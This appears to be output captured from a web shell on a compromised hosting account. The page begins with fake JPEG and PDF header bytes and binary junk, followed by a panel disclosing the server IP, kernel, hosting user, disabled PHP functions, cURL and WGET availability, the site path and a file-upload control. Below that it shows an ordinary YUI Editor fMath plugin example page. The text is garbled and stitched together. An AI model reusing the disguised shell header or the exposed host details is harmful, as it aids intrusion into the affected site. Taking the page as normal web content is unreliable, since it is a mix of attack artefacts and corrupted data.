ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/blogs/fileman1/ |
Upload File : |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>YUI Editor - fMath Plugin</title> <link rel="stylesheet" type="text/css" href="yui_2.8.2r1/yui/build/menu/assets/skins/sam/menu.css" /> <link rel="stylesheet" type="text/css" href="yui_2.8.2r1/yui/build/button/assets/skins/sam/button.css" /> <link rel="stylesheet" type="text/css" href="yui_2.8.2r1/yui/build/fonts/fonts-min.css" /> <link rel="stylesheet" type="text/css" href="yui_2.8.2r1/yui/build/container/assets/skins/sam/container.css" /> <link rel="stylesheet" type="text/css" href="yui_2.8.2r1/yui/build/editor/assets/skins/sam/editor.css" /> <script type="text/javascript" src="yui_2.8.2r1/yui/build/yahoo-dom-event/yahoo-dom-event.js"></script> <script type="text/javascript" src="yui_2.8.2r1/yui/build/element/element-min.js"></script> <script type="text/javascript" src="yui_2.8.2r1/yui/build/animation/animation-min.js"></script> <script type="text/javascript" src="yui_2.8.2r1/yui/build/container/container-min.js"></script> <script type="text/javascript" src="yui_2.8.2r1/yui/build/menu/menu-min.js"></script> <script type="text/javascript" src="yui_2.8.2r1/yui/build/button/button-min.js"></script> <script type="text/javascript" src="yui_2.8.2r1/yui/build/editor/editor-min.js"></script> <!--there is no custom header content for this example--> <link rel="stylesheet" type="text/css" href="fmath_formula/fmath_formula.css" /> <script type="text/javascript" src="fmath_formula/fmath_formula.js"></script> </head> <body class="yui-skin-sam"> <center> <!--BEGIN SOURCE CODE FOR EXAMPLE =============================== --> <form method="post" action="#" id="form1"> <textarea id="editor" name="editor" rows="20" cols="75"> This is some more test text.<br>This is some more test text.<br>This is some more test text.<br>This is some more test text.<br>This is some more test text.<br>This is some more test text.<br>This is some more test text.<br> </textarea> </form> <script> (function() { var Dom = YAHOO.util.Dom, Event = YAHOO.util.Event; var myConfig = { height: '300px', width: '850px', dompath: true, focusAtStart: true }; var myEditor = new YAHOO.widget.Editor('editor', myConfig); initFMathFormula(myEditor); myEditor.render(); })(); </script> <!--END SOURCE CODE FOR EXAMPLE =============================== --> </center> </body> </html>